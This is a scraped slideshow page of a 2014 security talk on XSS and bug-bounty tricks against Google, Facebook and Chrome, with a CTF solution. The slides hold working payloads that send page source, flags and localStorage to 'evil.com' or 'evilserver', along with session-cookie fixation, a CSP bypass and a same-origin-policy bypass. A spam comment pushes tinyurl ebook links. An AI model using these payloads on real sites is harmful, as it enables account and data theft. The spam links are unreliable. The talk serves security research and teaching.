Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

6.2. Hacking most popular websites

611 views

Published on

Meeting #6.

Published in: Internet
  • DOWNLOAD FULL. BOOKS INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

6.2. Hacking most popular websites

  1. 1. Tricks to hack most popular websites on the planet By Pavel Toporkov Jun 07, 2014
  2. 2. Pavel Toporkov Positive Technologies CTF player and organizer Bug hunter
  3. 3. Bug Bounty Found bugs - got bucks Bug Bounty programs: • Google • Facebook • Paypal • Github • Yandex • Mail.ru
  4. 4. They are not so dumb • All SQL queries are escaped • All user-controlled output is escaped • External entities are disallowed • and so on...
  5. 5. Good news everyone! We have XSS
  6. 6. Google bug Google API Developer
  7. 7. Google API Developer
  8. 8. iframe postMessage
  9. 9. Vuln #1 It’s possible to change iframe location. https://developers.google.com/apis- explorer/?base=https://evil.com%23webapis- discovery.appspot.com/_ah/api#
  10. 10. Vuln #2 Not secure tokens token_1 = location.hash.split('rpctoken=')[1]; token_2 = window.name;
  11. 11. Vuln #3 It’s possible to change documentation link.
  12. 12. Reverse Clickjacking time!
  13. 13. Reverse Clickjacking http://domain/search?query=a&callback=draw <script> draw({"result":[search_result1, search result2]}) </script>
  14. 14. Reverse Clickjacking Attacker can use useful functions: document.forms[2].submit document.links[4].click
  15. 15. Reverse Clickjacking document.body.lastElementChild. previousSibling.lastElementChild. firstElementChild.firstElementChild. lastElementChild.firstElementChild. firstElementChild.firstElementChild. nextSibling.click
  16. 16. Exploit token_1 = location.hash.split('rpctoken=')[1]; token_2 = window.name; send_payload(data,token_1,token_2); window.setTimeout('document.location=callbac k_url;',3000);
  17. 17. Pew Pew
  18. 18. PHD CTF 2014 Quals
  19. 19. DT_VCS #1. JSONP callback spoofing /colorer.php?callback=loadCode&code=code&la ng=php Trying to set lang value to “&callback=alert”…
  20. 20. DT_VCS #2. XSS via Revese Clickjacking. Post link like: “javascript:alert('PWN')” And callback like: ”document.body.firstChild.firstChild.nextSibling.firstChild.next Sibling.firstChild.click”
  21. 21. DT_VCS
  22. 22. DT_VCS Trying to steal cookie… 195.133.87.174 - - [27/Jan/2014:14:18:45 +0000] "GET /?phd=PHPSESSID=2ch9tmve1potrd36hhklcg8tv4 HTTP/1.1" 200 647 "http://localhost/contributes.php?id=857" "Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20130619 SlimerJS/0.8.4“ But PHPSESSID is not auth cookie. Let’s try to get page source via XSS. document.write('<iframe name=ifr src=code.php onload=location.replace("http://evil.com/?phd="+btoa(ifr.document.body. innerHTML))>')
  23. 23. DT_VCS Page source: <form method=POST action=/code.php?deleteall> <img src=/captcha.php> <br> <input name=code> <input type=submit> </form>
  24. 24. CAPTCHA over XSS?
  25. 25. DT_VCS Seems like PHPSESSID used for storing correct CAPTCHA value. So if we set our PHPSESSID cookie in admin browser, we could know the correct captcha value.
  26. 26. DT_VCS captcha='M6yEnn'; document.cookie='PHPSESSID=aminqljt6e7senfe9m53ucfoa0'; b=new XMLHttpRequest(); b.open('POST','/code.php?deleteall',true); b.withCredentials=true; b.setRequestHeader('Content-Type', 'application/x-www-form- urlencoded') b.onreadystatechange = function() { a=new XMLHttpRequest(); a.open('GET','http://evil.com/?flag='+b.responseText,true); a.send(); } b.send('code='+captcha);
  27. 27. DT_VCS 195.133.87.174 - - [27/Jan/2014:15:08:46 +0000] "GET /?flag=Good%20work.%20Here%20is%20the%20flag :%20Nic3_Bl1nd_h4ck_x5s_n1Nj4 HTTP/1.1" 200 671 "http://localhost/contributes.php?id=863" "Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20130619 SlimerJS/0.8.4"
  28. 28. Facebook bug https://developers.facebook.com/tools/explorer?path={ADDR} <script src=“http://graph.facebook.com/{ADDR}?callback=func”> </script> /**/ func({ "id": "10000000000000", "first_name": "Bug", "last_name": "Hunter", });
  29. 29. Solution /login.php?next=address – redirects to address https://developers.facebook.com/tools/explorer ?method=GET&path=login.php?next%3dhttps %253a//graph.facebook.com/me%253fcallbac k%253dalert
  30. 30. How it works? Page /login.php Evil Payload 302 Redirect
  31. 31. And now we have problem
  32. 32. Content Security Policy Seems like we need to find another place for our payload
  33. 33. Fuck it!
  34. 34. Dat feeling when you love IE
  35. 35. Content Security Policy Internet Explorer completely ignores “Content Security-Policy” header It requires “X-Content-Security-Policy” header
  36. 36. Boooooom!
  37. 37. Video
  38. 38. Chrome tricks var origin = location.href.match(/w+://[^/]+/)[0]; var url = 'http://domain/search2?query=' + encodeURIComponent(params.query) + '&token=' + encodeURIComponent(params.token) + '&key=' + key + '&origin=' + origin;
  39. 39. Chrome tricks Let’s look a RFC1738 URL format: //<user>:<password>@<host>:<port>/<url-path>
  40. 40. Chrome tricks And if we try something like that http://i_can_decode_something_like_this_&quot@pw ny.in/reflector.php?data=<script>document.write(loc ation)</script>
  41. 41. Chrome tricks PoC to steal localStorage: http://domain&quot- location.replace(decodeURIComponent(&quot%2f%2 fevilserver%2f&quot)+JSON.stringify(localStorage))- &quot@domain/s02#query=smthing
  42. 42. Chrome tricks And now we need to bypass this: if (XSS.sanitizeURL(location.href) !== location.href) { location = 'about:blank'; } How it’s possible?
  43. 43. Chrome tricks HOLY 0DAYZZZ SOP BYPASS!!!
  44. 44. Chrome tricks The main idea of SOP Bypass very simple - just execute history.pushState with context of another page like this: history.pushState.apply( frames[1].history, ['','',payloaded_url] ); // Fixed now 
  45. 45. Chrome tricks
  46. 46. The End @Paul_Axe http://paul-axe.blogspot.com/ Questions?

×